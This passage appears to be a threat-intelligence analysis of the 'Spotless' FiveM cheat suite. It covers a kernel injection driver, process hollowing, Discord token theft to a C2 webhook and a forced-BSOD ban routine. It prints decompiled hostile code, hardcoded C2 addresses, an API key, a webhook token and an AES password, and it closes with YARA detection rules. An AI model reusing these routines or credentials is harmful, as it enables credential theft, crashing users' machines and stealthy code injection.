  puVar5 = ExAllocatePoolWithTag(1, puVar2[1], 0x6754794d);  // tag 'MyTg'
  ProbeForRead(*(puVar2+2), puVar2[1], 1);
  memcpy(puVar5, *(puVar2+2), puVar2[1]);

  // Allocate worker context (PID + DLL ptr + size):
  puVar6 = ExAllocatePoolWithTag(0, 0x18, 0x7854794d);       // tag 'MyTx'
  *puVar6       = (ulonglong)*puVar2;    // target PID
  puVar6[1]     = (ulonglong)puVar5;    // kernel DLL buffer
  *(uint *)(puVar6+2) = puVar2[1];      // DLL size

  // Spin up kernel system thread to perform the map:
  PsCreateSystemThread(local_res18, 0x1fffff, 0, 0, 0,
                       FUN_140003c40, puVar6);
  // FUN_140003c40 attaches to target EPROCESS via KeStackAttachProcess,
  // allocates VA via ZwAllocateVirtualMemory, and maps via MmCopyVirtualMemory.
  // Injected DLL: netcom.dll
}

The same driver export also carries netcom.dll as the operational mapped DLL name and a leftover test artifact: hello-world.dll plus the PDB path C:\projects\hello-world-dll\Release\x64\hello-world.pdb. That does not change the observed Spotless behavior, but it is useful attribution evidence for how the manual mapper was developed and tested.

File system hooks — hiding prefetch, WER dumps, crash dumps

From fileSPOTLESS W DRIVERneguin.sys.txt
void FUN_140004e70(undefined8 param_1, longlong *param_2) {
  pcVar1 = (code *)*param_2;

  if      (pcVar1 == NtCreateFile_exref)         { pcVar2 = FUN_1400048c0; }
  else if (pcVar1 == NtOpenFile_exref)            { pcVar2 = FUN_140004be0; }
  else if (pcVar1 == NtQueryDirectoryFile_exref)  { pcVar2 = FUN_140004ec0; }

  DAT_14000b408 = pcVar1;   // save original pointer
  *param_2 = (longlong)pcVar2;  // install hook

  // IOCTL control strings:
  "IOCTL: File hooks ENABLED"
  "IOCTL: File hooks DISABLED"
}

// Paths suppressed by the hooks (anti-cheat artifact directories):
\PREFETCH\
\PROGRAMDATA\MICROSOFT\WINDOWS\WER\REPORTARCHIVE\
\APPDATA\LOCAL\CRASHDUMPS\

Discord Token Theft — How It Works

DEEP_MB.dll.txt
Token Theft

All three Discord variants scanned. Every .ldb file read. Tokens exfiltrated to C2.

The function in MB.dll calls SHGetFolderPathA(0, 0x1a, 0, 0, buf) to get the %APPDATA% path, then builds paths to Discord, Discord Canary, and Discord PTB LevelDB directories. It iterates all *.ldb files using FindFirstFileA and reads token data from each one.

LevelDB .ldb files are how Discord stores session tokens locally. The function scans all three Discord variants simultaneously — Discord, Discord Canary, and Discord PTB.

From fileDEEP_MB.dll.txt
// Step 1: Get %APPDATA% path
iVar2 = SHGetFolderPathA(0, 0x1a, 0, 0, local_268);

if (iVar2 < 0) {
  // AppData not found — clear output and return
  *param_2 = 0;
  param_2[1] = 0;
  param_2[2] = 0;
  param_2[3] = 0xf;
  *(undefined1 *)param_2 = 0;
}
else {
  // Step 2: Copy AppData path into three separate base strings
  FUN_180004e8c(local_348 + 8, local_268);   // base for discord
  FUN_180004e8c(local_348 + 4, local_268);   // base for discordcanary
  FUN_180004e8c(local_348,     local_268);   // base for discordptb

  // Step 3: Append LevelDB paths to each base
  FUN_180016818(local_2c8, local_348 + 8, "\discord\Local Storage\leveldb");
  FUN_180016818(local_2a8, local_348 + 4, "\discordcanary\Local Storage\leveldb");
  FUN_180016818(local_288, local_348,     "\discordptb\Local Storage\leveldb");

  // Step 4: Enumerate *.ldb files in each directory
  hFindFile = FindFirstFileA((LPCSTR)lpFileName, &local_158);

  if (hFindFile != (HANDLE)0xffffffffffffffff) {
    // Iterate all .ldb files and read token data from each
    // Extracted token is exfiltrated via webhook / C2
    FindClose(hFindFile);
  }
}

The addresses where the three target paths are stored in MB.dll:

From fileDEEP_MB.dll.txt
18009c3d0  discordcanaryLocal Storageleveldb
18009c3f8  discordLocal Storageleveldb
18009c418  *.ldb                              ← wildcard file pattern
18009c420  discordptbLocal Storageleveldb

After extraction, token data is sent to the operator via the hardcoded Discord webhook and to the C2 server. The API payload includes a discordId field and "encrypted":true, meaning tokens are AES-encrypted using the same key from crypt.exe before transmission.

BSOD Enforcement — Banned Machines Get Blue-Screened

DEEP_MB.dll.txt
Critical — Destructive Capability

If the HWID check returns 'banned', the machine is forced into a Blue Screen of Death.

MB.dll loads ntdll.dll at runtime, resolves RtlAdjustPrivilege and NtRaiseHardError via GetProcAddress, elevates the process privilege to SE_SHUTDOWN_PRIVILEGE (0x13), then calls NtRaiseHardError with error code 0xc0000420 and option 6 (OptionShutdownSystem). This is the standard BSOD-via-usermode technique. The machine crashes immediately.

The BSOD path is explicit in the recovered function:

From fileDEEP_MB.dll.txt
{
  HMODULE hModule;
  FARPROC pFVar1;   // RtlAdjustPrivilege
  FARPROC pFVar2;   // NtRaiseHardError
  undefined1 local_res8[8];
  undefined4 local_res10[2];

  hModule = GetModuleHandleA("ntdll.dll");

  if (hModule != (HMODULE)0x0) {
    pFVar1 = GetProcAddress(hModule, "RtlAdjustPrivilege");
    pcVar3 = "NtRaiseHardError";
    pFVar2 = GetProcAddress(hModule, "NtRaiseHardError");

    if ((pFVar1 != (FARPROC)0x0) && (pFVar2 != (FARPROC)0x0)) {

      // Step 1: Elevate to SE_SHUTDOWN_PRIVILEGE (0x13)
      local_res8[0] = 0;
      (*pFVar1)(0x13,
                CONCAT71((int7)((ulonglong)pcVar3 >> 8), 1),
                0,
                local_res8);

      // Step 2: Force BSOD via NtRaiseHardError
      local_res10[0] = 0;
      (*pFVar2)(0xc0000420,  // STATUS_ASSERTION_FAILURE → BSOD trigger
                0,
                0,
                0,
                6,           // OptionShutdownSystem — forces crash
                local_res10);
    }
  }
  return;
}

The BSOD string constants, addresses confirmed in .rdata:

From fileDEEP_MB.dll.txt
1800894e0  ntdll.dll
1800894f0  RtlAdjustPrivilege      ← loaded dynamically to avoid import detection
180089508  NtRaiseHardError        ← loaded dynamically
18008951c  BANNED                  ← ban status string matched before trigger

This mechanism is the operator's anti-HWID-sharing enforcement. A user who shares their account credentials triggers a HWID mismatch. The server responds with banned status. MB.dll receives that response, calls this function, and the machine immediately BSODs. The user's machine will reboot into a crash dump analysis loop. The operator logs the ban event to their Discord webhook simultaneously.

Process Hollowing — dllhost.exe as the Host

DEEP_MB.dll.txt

MB.dll implements a full RunPE / Process Hollowing subsystem. The primary target is C:\Windows\System32\dllhost.exe — the legitimate DCOM server launch wrapper. The cheat payload is injected into a fresh dllhost.exe process, which then carries the bypass code while appearing as a Windows system process in any process list.

From fileDEEP_MB.dll.txt
// Hollowing launch function:
if (iVar1 == 0) {
  iVar1 = CreateProcessAsUserA(
            param_1,
            "C:\Windows\System32\dllhost.exe",  // ← hollowing target
            (LPSTR)0x0,
            (LPSECURITY_ATTRIBUTES)0x0,
            (LPSECURITY_ATTRIBUTES)0x0,
            1,       // bInheritHandles
            4,       // CREATE_SUSPENDED — process starts paused for hollowing
            (LPVOID)0x0,
            (LPCSTR)0x0,
            param_3,
            param_4);
} else {
  iVar1 = CreateProcessAsUserA(
            param_1,
            "C:\Windows\System32\dllhost.exe",
            (LPSTR)0x0, ...,
            0x404,   // CREATE_SUSPENDED | CREATE_UNICODE_ENVIRONMENT
            local_res10,  // environment block
            ...);
  DestroyEnvironmentBlock(local_res10);
}

The error strings are in Brazilian Portuguese — same developer language as crypt.exe:

From fileDEEP_MB.dll.txt
18009a820  "GetSubsystem (target) falhou"
           → "GetSubsystem (target) failed" — can't read target PE subsystem

18009a840  "Subsystem incompativel (CONSOLE vs GUI)"
           → "Incompatible subsystem (CONSOLE vs GUI)"

18009a870  "RunPE/RunPEReloc falhou (VirtualAllocEx/WriteProcessMemory/SetContext)"
           → "RunPE/RunPEReloc failed" — main injection failed

18009a9c0  "C:\Windows\System32\dllhost.exe"   ← primary target path
18009a9e0  "[Loader] Falha Process Hollowing:"   → "[Loader] Process Hollowing Failed:"
18009aa08  "[Loader] Falha ao baixar:"            → "[Loader] Download Failed:"

Fallback hollowing targets also present in the string table: chrome.exe, RuntimeBroker.exe, msedgewebview2.exe. The injector checks process subsystem compatibility before carving — a CONSOLE-subsystem target can't host a GUI-subsystem payload.

MB.dll — Authentication, HWID, and C2 Control

DEEP_MB.dll.txt / extract_MB.dll.txt

MB.dll is the core C2 and authentication module — a large 64-bit DLL (.text: 0x84400 bytes, .data: 0x12fdb8 bytes). The release date embedded in the data section is 20.02.2026. The developer's local build path appears in assertion strings: C:\Users\Gun\Desktop\KCustom\Kernel-UI-Protected\src\menu\screen\Background.cpp.

Authentication flow — init and session validation

Users authenticate with a Discord ID (17–21 numeric characters) and a password (17–21 characters). The init/auth path returns a sessionid, expiry, webhookUrl, and command field, with /api/ep/init and /api/ep/auth both present in the endpoint map. The session validation loop handles five distinct error states:

From fileDEEP_MB.dll.txt
FUN_1800177f0(local_28, "Invalid session",               0)
FUN_1800177f0(local_28, "Session expired",               0)
FUN_1800177f0(local_28, "Invalid or unvalidated session", 0)
FUN_1800177f0(local_28, "No active session",             0)
FUN_1800177f0(local_28, "Session terminated",            0)

// Additional login error messages surfaced to user:
"Access denied - You are blacklisted"
"HWID security check failed. Access denied."
"Account is not paid. Please upgrade your account."
"Login failed. Invalid credentials or server error."
"Discord ID must be between 17 and 21 characters (numbers only)"
"Password must be between 17 and 21 characters"

HWID check — the full API request

From fileextract_MB.dll.txt
// API endpoint:
POST http://93.127.141.9:5000/api/ep/hwid-whitelist-check?listType=

// Request headers (all hardcoded in .rdata):
User-Agent:  Loader-Protected/1.0        @ 1800895e0
API Key:     FTaC7sHRNwKbrMYR            @ 180089400
Salt:        470752974bfe5c36
Password:    SpotlessPriv2026             ← version identifier
Identifier:  0026d7bf

// HWID includes: PhysicalDrive serials, GUID {557CF406-1A04-11D3-9A73-0000F81EF32E}
// External IP fetched from api.ipify.org/?format=json (User-Agent: Mozilla/5.0)

// Server responses:
"allowed"       → proceed to cheat load
"not_in_list"   → HWID not registered
"suspect"       → flagged, webhook notified
"banned"        → trigger NtRaiseHardError BSOD (see above)

Discord webhook — every login and ban logged to operator

From fileDEEP_MB.dll.txt
// Webhook URL hardcoded at address 0x18009a940:
POST https://discord.com/api/webhooks/1472751394154086491/
     H0o1y5y0LvXLDlrni0TyGTAgTd48th0KISqy6WlUVp8Bv5BxKWXSfcQhreoPdq6nKwUF

// Two log types sent to operator's Discord server:
1800897c8  "Access Log"   — HWID check events (who ran the bypass and when)
18009c2a0  "Login Log"    — successful/failed login events

// webhookUrl is also returned dynamically by /api/ep/init,
// allowing operators to rotate it server-side without a binary update.

Background aurora shader — embedded HLSL source

The MB.dll overlay menu renders a raymarched DirectX 11 aurora background in HLSL. The full shader source is embedded as a string constant in the binary. Dark grey base color (0.04, 0.04, 0.04). Developer commented it in Portuguese: "fundo cinza escuro" (dark grey background).

crypt.exe — AES-CBC File Encryptor

DEEP_crypt.exe.txt / extract_crypt.exe.txt

crypt.exe is a standalone 64-bit utility (ImageBase 0x140000000, .text: 0x6400 bytes) with no network functionality. Its only external imports are BCRYPT.DLL (11 BCrypt functions), SHELL32.DLL (drag-and-drop argument parsing via CommandLineToArgvW), KERNEL32.DLL, and USER32.DLL (MessageBoxA for the Portuguese error dialogs).

The developer's intent was for operators to encrypt payloads before distribution and decrypt them on the target machine. In practice, the AES key is in plaintext in the binary (documented above), making the encryption security theater — anyone who has the binary can decrypt any Spotless payload.

From fileextract_crypt.exe.txt
BCRYPT.DLL  →  BCryptOpenAlgorithmProvider
BCRYPT.DLL  →  BCryptGenerateSymmetricKey
BCRYPT.DLL  →  BCryptCreateHash
BCRYPT.DLL  →  BCryptSetProperty
BCRYPT.DLL  →  BCryptHashData
BCRYPT.DLL  →  BCryptDestroyHash
BCRYPT.DLL  →  BCryptCloseAlgorithmProvider
BCRYPT.DLL  →  BCryptFinishHash
BCRYPT.DLL  →  BCryptGenRandom
BCRYPT.DLL  →  BCryptDecrypt
BCRYPT.DLL  →  BCryptEncrypt
BCRYPT.DLL  →  BCryptDestroyKey

bufa.dll — Bypass Core & Driver Loader

DECOMP_bufa.dll.txt / DEEP_bufa.dll.txt / extract_bufa.dll.txt

bufa.dll is the bypass operations layer (64-bit, ImageBase 0x180000000, .text: 0x9e600 bytes). Its .rdata section contains the LLVM-MSVC compiler banner: "Welcome to use llvm-msvc.". It is the glue between usermode and the kernel driver — handling file-system manipulation, registry tampering, session detection, and embedded driver loading.

PDB Artifact

BFDriverLoader project — ETW hook driver loader

PDB path in binary: \etw_hook\outputs\x64\Release\BFDriverLoader.pdb. The project name confirms bufa.dll incorporates an ETW-hook-capable driver loader component.

Developer 3

handle "swift" — separate fivem-spoofer project

PDB path: C:\Users\swift\Documents\pastes\fivem-spoofer\spoofer-drv\build\kernel_hook.pdb. Third distinct developer/build identity after TZX and Gun. Stored in a pastes folder — code shared informally, not via version control.

From fileDECOMP_bufa.dll.txt / DEEP_bufa.dll.txt / extract_bufa.dll.txt
// Developer 2 / payload lineage (Gun):
1800a4591  etw_hookoutputsdReleaseBFDriverLoader.pdb
           C:UsersGunDesktopKCustomKernel-UI-Protected...

// Developer 3 / driver-loader lineage (swift):
1800be878  C:UsersswiftDocumentspastesivem-spooferspoofer-drvuildkernel_hook.pdb

// Compiler identity:
1800aeb10  "Welcome to use llvm-msvc."   ← LLVM-MSVC linker banner

// Secondary C2 user-agent:
1800aebce  swft/1.0                      ← swift marker reused as WinHTTP user-agent

// FiveM target confirmation:
             "FiveM"                     ← appears directly in data section

// Kernel API strings resolved at runtime (not statically imported):
ZwQuerySystemInformation   RtlImageNtHeader       RtlImageDirectoryEntryToData
MmGetSystemRoutineAddress  IoCreateFileEx         MmFlushImageSection
ZwDeleteFile               IoFileObjectType       IofCompleteRequest
IoCreateDevice             PsCreateSystemThread   ObReferenceObjectByHandle
ntoskrnl.exe               ← all resolved dynamically to avoid import-scan detection

File system and registry operations

File ops: CreateHardLinkW, CreateSymbolicLinkW, CopyFileW — creates decoy copies and hard links to hide bypass files
Enumeration: FindFirstFileA/W, FindFirstFileExW, FindNextFileW — directory scanning for cleanup and artifact avoidance
Registry: RegOpenKeyExA, RegQueryValueExA, RegDeleteValueA, RegSetValueExA — modifies values that anti-cheat systems check
ADVAPI32 crypto: CryptAcquireContextA, CryptCreateHash, CryptEncrypt, CryptDecrypt — secondary encryption layer for runtime data
Session detect: WTSGetActiveConsoleSessionId — detects screenshare/remote sessions and adapts behavior
Driver comms: DeviceIoControl — sends IOCTL 0x222004 to \Device\VolCache (neguin.sys)

v3.dll — Main Cheat Engine

DEEP_v3.dll.txt / extract_v3.dll.txt

v3.dll is the largest binary in the suite at 9.5 MB (.text: 0x2afe00 bytes, .rdata: 0x363000 bytes). PE timestamp: May 29 2026 at 16:29:35 — this is a very recent build. It bundles DirectX 11 HLSL shaders, Dear ImGui 1.91.3 WIP (19121), Inter font v3.019, and a full FiveM cheat feature set.

From fileDEEP_v3.dll.txt
18055f468  "May 29 2026  16:29:35"     ← PE compile timestamp
1802bf298  "Dear ImGui 1.91.3 WIP (19121)"  ← UI framework version

Cheat feature strings — ESP, radar, and bypass indicators

From fileDEEP_v3.dll.txt
// Player ESP:
18055cf90  Show Players          18055cfa0  Show Deads
18055cfb0  Show Peds             18055cfc0  Visible Check##esp
18055d050  Enable Skeleton       18055d070  Enable Box
18055d080  Show Friends##color   18055d0a8  Enable Health
18055d0e8  Enable Armor          18055d128  Enable Name
18055d1a8  Enable Weapon         18055d220  Weapon Icon Size

// Radar system:
18055d530  Enable Radar          18055d5a0  Radar Show Players
18055d698  Enable Radar##vis     18055d6b0  Enable Radar##invis
18055d710  Radar Show Players##vis

// Arrow ESP:
18055d890  Arrows Show Players

// Anti-detection bypass indicator:
18055cfe8  "Electron Bypass"     ← explicitly targets FiveM's Electron-based AC

// Map reference (GTA V location data for radar/ESP):
1805effd0  "FIB Building"        ← Federal Investigation Bureau building

DirectX 11 HLSL shader — embedded as string

From fileDEEP_v3.dll.txt
// Full shader source is a string constant in v3.dll:
cbuffer vertexBuffer : register(b0) {
  float4x4 ProjectionMatrix;
};
struct VS_INPUT {
  float2 pos : POSITION;
  float4 col : COLOR0;
  float2 uv  : TEXCOORD0;
};
PS_INPUT main(VS_INPUT input) {
  output.pos = mul(ProjectionMatrix, float4(input.pos.xy, 0.f, 1.f));
  output.col = input.col;
  output.uv  = input.uv;
}
// Pixel shader with texture sampling for overlay rendering

A dedicated .fptable section (0x200 bytes, RW) stores resolved CitizenFX function pointers at runtime — a standard FiveM cheat technique to intercept game functions without static import references.

fulano.dll — Injector with FiveM Build Targeting

DEEP_fulano.dll.txt

fulano.dll is the DLL injector (64-bit, ImageBase 0x180000000, .text: 0x473a00 bytes — over 4.6 MB of code). The large code size comes from a statically-linked FreeType font rendering library (confirmed by font format strings and glyph processing data), plus D3D11 and D3DX11_43 for overlay rendering.

Build Coverage

16 FiveM process targets — 8 build versions × 2 process types.

Spotless maintains explicit support strings for every major FiveM game build from 2802 through 3751. Both the CitizenFX wrapper (GameProcess) and the underlying GTA V process (GTAProcess) are targeted for each build, giving the injector code-execution in both processes simultaneously.

From fileDEEP_fulano.dll.txt
1806d14e0  FiveM_b2802_GameProcess.exe     1806d1550  FiveM_b2802_GTAProcess.exe
1806d1518  FiveM_b2944_GameProcess.exe     1806d15c0  FiveM_b2944_GTAProcess.exe
1806d1588  FiveM_b3095_GameProcess.exe     1806d1628  FiveM_b3095_GTAProcess.exe
1806d1660  FiveM_b3323_GameProcess.exe     1806d1700  FiveM_b3323_GTAProcess.exe
1806d16c8  FiveM_b3407_GameProcess.exe     1806d1770  FiveM_b3407_GTAProcess.exe
1806d1738  FiveM_b3570_GameProcess.exe     1806d17e0  FiveM_b3570_GTAProcess.exe
1806d17a8  FiveM_b3751_GameProcess.exe     1806d1828  FiveM_b3751_GTAProcess.exe
1806d15f8  FiveM_GameProcess.exe           1806d1698  FiveM_GTAProcess.exe
1806d3f38  "FiveM Duplicate"               ← anti-duplication detection string
1806d48d8  "Spotless"                      ← self-identification

Injection technique — file-backed mapping to avoid WriteProcessMemory detection

CreateToolhelp32Snapshot → Process32FirstW/NextW — enumerate all processes to find FiveM build match
Module32FirstW/NextW — enumerate loaded modules for injection base address
OpenProcess → VirtualAllocEx — allocate memory in target process
MapViewOfFile / CreateFileMappingA / UnmapViewOfFile — file-backed alternative to WriteProcessMemory
LoadLibraryA/W / GetProcAddress / FreeLibrary — standard DLL load and export resolution
SetFileAttributesA / DeleteFileA — cleanup staging files post-injection

bananacomleite.exe — Main Loader ("banana with milk")

DEEP_bananacomleite.exe.txt

bananacomleite.exe — "banana com leite" means "banana with milk" in Brazilian Portuguese — is the main user-facing launcher and the largest binary in the suite at 19.7 MB (.text: 0x215800 bytes, .data: 0x15839c bytes). It bundles a complete statically-linked libcurl stack and implements RSA public key certificate pinning to prevent TLS interception. The UI stack is Dear ImGui 1.92.3 WIP (19223), with D:\Projets\TZX\TZX\ source paths and high-performance GPU exports NvOptimusEnablement / AmdPowerXpressRequestHighPerformance.

TLS Pinning

RSA public key pinned — MitM interception blocked by design.

The launcher uses libcurl's sha256// fingerprint mechanism. Any TLS certificate presented by the C2 that doesn't match the pinned hash is rejected outright. Even redirecting DNS to a proxy server fails the TLS handshake unless the proxy presents the exact pinned certificate.

From fileDEEP_bananacomleite.exe.txt
140219100  sha256//
140219110  "public key hash: sha256//%s"   ← log format for pin mismatch
140219130  ;sha256//                       ← multiple pins supported
1402190c0  -----BEGIN PUBLIC KEY-----      ← embedded RSA public key start
1402190e0  -----END PUBLIC KEY-----

// libcurl SSL configuration errors (confirms libcurl version and TLS support):
140219040  "Unrecognized parameter value passed via CURLOPT_SSLVERSION"
140219080  "CURL_SSLVERSION_MAX incompatible with CURL_SSLVERSION"

// Full protocol support (all statically linked):
HTTP/1.0, HTTP/1.1, HTTPS, SOCKS4, SOCKS4a, SOCKS5, SOCKS5h, proxy

The launcher also performs full Windows certificate chain validation via CRYPT32: CertGetCertificateChain, CertFreeCertificateChain, PFXImportCertStore, CertOpenStore, CertEnumCertificatesInStore, CryptQueryObject, CryptDecodeObjectEx. A DirectX 11 rendering context is created via D3D11CreateDevice for the launcher UI, and DWM borderless window styling via DwmSetWindowAttribute.

Launcher Targeting

28 FiveM process strings — broader than fulano.dll's 16-target injector map.

bananacomleite.exe carries both GameProcess and GTAProcess names for builds 1604 through 3570, plus generic FiveM process names. fulano.dll separately carries the later 2802–3751 injector map.

From fileDEEP_bananacomleite.exe.txt
1403c41a8  FiveM_b1604_GameProcess.exe   1403c4360  FiveM_b1604_GTAProcess.exe
1403c41c8  FiveM_b2060_GameProcess.exe   1403c4380  FiveM_b2060_GTAProcess.exe
1403c41e8  FiveM_b2189_GameProcess.exe   1403c43a0  FiveM_b2189_GTAProcess.exe
1403c4208  FiveM_b2372_GameProcess.exe   1403c43c0  FiveM_b2372_GTAProcess.exe
1403c4228  FiveM_b2545_GameProcess.exe   1403c43e0  FiveM_b2545_GTAProcess.exe
1403c4248  FiveM_b2612_GameProcess.exe   1403c4400  FiveM_b2612_GTAProcess.exe
1403c4268  FiveM_b2699_GameProcess.exe   1403c4420  FiveM_b2699_GTAProcess.exe
1403c4288  FiveM_b2802_GameProcess.exe   1403c4440  FiveM_b2802_GTAProcess.exe
1403c42a8  FiveM_b2944_GameProcess.exe   1403c4460  FiveM_b2944_GTAProcess.exe
1403c42c8  FiveM_b3095_GameProcess.exe   1403c4480  FiveM_b3095_GTAProcess.exe
1403c42e8  FiveM_GameProcess.exe         1403c44a0  FiveM_GTAProcess.exe
1403c4300  FiveM_b3323_GameProcess.exe   1403c44b8  FiveM_b3323_GTAProcess.exe
1403c4320  FiveM_b3407_GameProcess.exe   1403c44d8  FiveM_b3407_GTAProcess.exe
1403c4340  FiveM_b3570_GameProcess.exe   1403c44f8  FiveM_b3570_GTAProcess.exe

CTM Loader DLLs — 1kCUGOZADO_CTM.dll & kCUGOZADO_CTM.dll

DEEP_1kCUGOZADO_CTM.dll.txt / DEEP_kCUGOZADO_CTM.dll.txt

Two nearly-identical CTM loader DLLs exist — same C2 configuration, same API key, same salt, same webhook, same ImGui version. The difference is a path variant (an aaaa subdirectory inserted in the build path) and version strings — 1kCUGOZADO_CTM.dll is the older "Spotless External" build, kCUGOZADO_CTM.dll adds the "Spotless V3" identifier. The private string SpotlessPriv2026 is present in MB.dll, not in these CTM exports.

From fileDEEP_1kCUGOZADO_CTM.dll.txt / DEEP_kCUGOZADO_CTM.dll.txt
// Identical in both CTM DLLs:
http://93.127.141.9:5000
FTaC7sHRNwKbrMYR       ← API key
470752974bfe5c36       ← salt
/api/ep/hwid-whitelist-check
discord.com/api/webhooks/1472751394154086491/H0o1y5...
Dear ImGui 1.91.9 WIP (19186)

// Developer path — note the "aaaa" subdirectory (different from MB.dll):
// MB.dll path:
C:UsersGunDesktopKCustomKernel-UI-Protectedextackendsimguiimgui.h
// CTM DLL path (both variants):
C:UsersGunDesktopaaaaKCustomKernel-UI-Protectedextackendsimguiimgui.h

// Version distinction:
1kCUGOZADO_CTM.dll  →  "Spotless External"             (older build)
kCUGOZADO_CTM.dll   →  "Spotless External" + "Spotless V3"  (latest)

TZX Connection — Confirmed in Code

DEEP_MB.dll.txt / DEEP_1kCUGOZADO_CTM.dll.txt
Cross-Project Link

api.tzproject.com actively assembled and called in authentication functions across three binaries.

This is not a dead string. api.tzproject.com is copied character-by-character from static string constants into local stack buffers and passed to HTTP request functions in the same code paths as the Spotless HWID and blacklist checks. Both the full subdomain and root domain are referenced as separate string constants used in distinct call sites.

From fileDEEP_MB.dll.txt / DEEP_1kCUGOZADO_CTM.dll.txt
// String addresses in MB.dll .rdata:
18009c5b0  tzproject
18009c5c8  api.tzproject.com
18009c5f8  tzproject.com
18009c608  fulano.dll          ← injector referenced immediately adjacent

// Authentication function (CTM DLLs) — string assembled into stack buffer:
*(undefined8 *)local_158 = s_api_tzproject_com_18009c5c8._0_8_;
*(undefined8 *)local_158 = s_api_tzproject_com_1800e6860._0_8_;
*(undefined8 *)local_178 = s_api_tzproject_com_1800e88e0._0_8_;

local_118[0] = s_tzproject_com_18009c5f8[0];
local_118[1] = s_tzproject_com_18009c5f8[1];
// ... (all qwords assembled from static string)
local_1c8[0x10] = s_api_tzproject_com_18009c5c8[0x10];

// Present in: MB.dll, 1kCUGOZADO_CTM.dll, kCUGOZADO_CTM.dll

Three possible relationships: (1) shared developer — Gun or swift also contributes to TZX; (2) backend licensing — Spotless uses TZX's authentication backend as a white-labeled service; (3) shared customer base — subscriptions validated across both systems. The important correction is that swift is a third file-backed identity, not just an alias for Gun or TZX. See our TZX detection report for full TZX IOCs. A machine with both Spotless and TZX artifacts is near-certain evidence of active bypass usage.

Anti-Detection Mechanisms

Kernel driver disguise

Driver device is named \Device\VolCache to resemble Windows volume cache internals.

Dynamic driver loading

NtLoadDriver is resolved and called dynamically instead of appearing plainly in imports.

ETW blinding

Hooks KiSystemServiceRepeat, kills Circular Kernel Context Logger, and uses ZwTraceControl / ZwSetSystemInformation.

Process protection

ObRegisterCallbacks strips PROCESS_VM_READ, PROCESS_VM_WRITE, and PROCESS_VM_OPERATION from handles.

Artifact hiding

Filesystem hooks suppress Prefetch, WER ReportArchive, and Local CrashDumps paths.

HWID spoofing

core::virtualizer::run mutates hardware identifiers before checks read them.

Trace cleaning

core::cleaner::hardware_cleaner removes registry and file traces linked to bans.

Anti-recording

NVIDIA ShadowPlay registry keys are checked before sensitive UI activity.

Debug / hook detection

Debugger checks and hook scans attempt to detect analysis and security tooling.

Payload encryption

DmcE magic, AES-CBC encrypted payloads, and high-entropy DLL packages.

HWID Algorithm

The recovered HWID path mixes obfuscated seed constants with the computer name, hashes the combined bytes with a djb2-style loop, then XORs the result with 0xa3b2c1d0. MB.dll also collects drive identifiers through \\.\PhysicalDrive%u and references GUID {557CF406-1A04-11D3-9A73-0000F81EF32E}.

Reconstructed HWID generation
seed1 = b"#`sOBMFpZM@wQFF"
seed2 = b"0tUVQE\\D}QSXY^U"  # XOR 0x10 = "DEFAULT MACHINE"

base = bytes(seed1[i] ^ seed2[i] for i in range(len(seed1)))
computer_name = GetComputerNameA()
combined = base + computer_name.encode()

hwid_hash = 0
for c in combined:
    hwid_hash = hwid_hash * 0x21 + c

hwid = hwid_hash ^ 0xa3b2c1d0

Encryption & Cryptography

Payload Files

DmcE + IV + ciphertext

Encrypted payloads use a DmcE magic header, 16-byte IV, and AES-CBC ciphertext. High entropy and the header create a clean file-based detection path.

crypt.exe

AES password is in .rdata

ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS and DmcAuth-salt are hardcoded. The KDF uses SHA-256 before generating the BCrypt AES key.

C2 Runtime

Legacy CryptAPI appears in bufa.dll

CryptDeriveKey, CryptHashData, CryptEncrypt, and CryptDecrypt indicate a secondary AES or RC4-style runtime layer for JSON requests.

Payload crypto format
Algorithm:      AES-256-CBC
KDF:            SHA-256 over password + DmcAuth-salt
Password:       ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS
Salt:           DmcAuth-salt
File format:    DmcE magic (4 bytes) + IV (16 bytes) + ciphertext
Workflow:       Drag payload onto Crypter.exe; encryption/decryption happens in place

IOCTLs

0x222004neguin.sys manual-map DLL injection into target FiveM process
0x80002000SYSTEM token theft: copies EPROCESS token from PID 4 into target EPROCESS offset 0x4B8
0x222414Enable filesystem hooks for artifact hiding
0x222418Disable filesystem hooks
0x220020Secondary driver operation in FUN_14000474c
0x900A4bufa.dll usermode command send path
0x900A8bufa.dll usermode response receive path

Detection Signatures

File-Based IOCs

Filenamesneguin.sys, bufa.dll, bananacomleite.exe, kCUGOZADO.dll, 1kCUGOZADO.dll, MB.dll, crypt.exe, taskthow.exe
MD5ec7409f6b4d8a65f32a2f15d89efc7c1 (crypt.exe)
MD587ec3469742c973ddd2326a20cb62089 (v3.dll)
MagicDmcE header on encrypted payloads
Entropy~8.0 on encrypted kCUGOZADO payloads

Behavioral IOCs

Driver LoadUnsigned driver exposing \\Device\\VolCache / \\DosDevices\\VolCache
ETWCircular Kernel Context Logger killed or suppressed
Pool TagsMyTg (0x6754794d), MyTx (0x7854794d)
Token TheftNon-Discord process reads Discord LevelDB .ldb files
Network Comboapi.ipify.org followed by discord.com/api/webhooks

YARA Rules

These are compact, high-signal rules derived from the strings and structure recovered in the analysis exports. Use them as a starting point and tune conditions against local false-positive baselines.

Spotless detection YARA set
rule neguin_sys_kernel_driver {
    meta:
        description = "Detects neguin.sys FiveM cheat kernel driver"
        date = "2026-06"
    strings:
        $s1 = "Injection Complete. Process" ascii
        $s2 = "IOCTL: Manual Map initiated" ascii
        $s3 = "EtwHookManager" ascii
        $s4 = "\\Device\\VolCache" wide
        $s5 = "\\DosDevices\\VolCache" wide
        $s6 = "CheckProtectedOperation" ascii
        $s7 = "teste.exe" ascii
        $s8 = "netcom.dll" wide
    condition:
        uint16(0) == 0x5A4D and 5 of them
}

rule bufa_dll_loader {
    strings:
        $ua = "swft/1.0" ascii
        $ct = "Content-Type: application/json" ascii
        $v1 = "virtualizer" ascii wide
        $v2 = "hardware_cleaner" ascii wide
        $v3 = "BFDriverLoader" ascii
    condition:
        uint16(0) == 0x5A4D and 2 of them
}

rule spotless_auth_payload {
    strings:
        $c2 = "http://93.127.141.9:5000" ascii
        $api = "FTaC7sHRNwKbrMYR" ascii
        $wh = "1472751394154086491" ascii
        $ban = "BANNED" ascii
        $mb_priv = "SpotlessPriv2026" ascii
        $s2 = "Spotless External" ascii
        $s3 = "HWID security check failed" ascii
        $s4 = "NtRaiseHardError" ascii
        $s5 = "Loader-Protected/1.0" ascii
        $ldb = "\\discord\\Local Storage\\leveldb" ascii
    condition:
        uint16(0) == 0x5A4D and 3 of them
}

rule crypt_exe_payload_encryptor {
    strings:
        $pw = "ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS" ascii
        $salt = "DmcAuth-salt" ascii
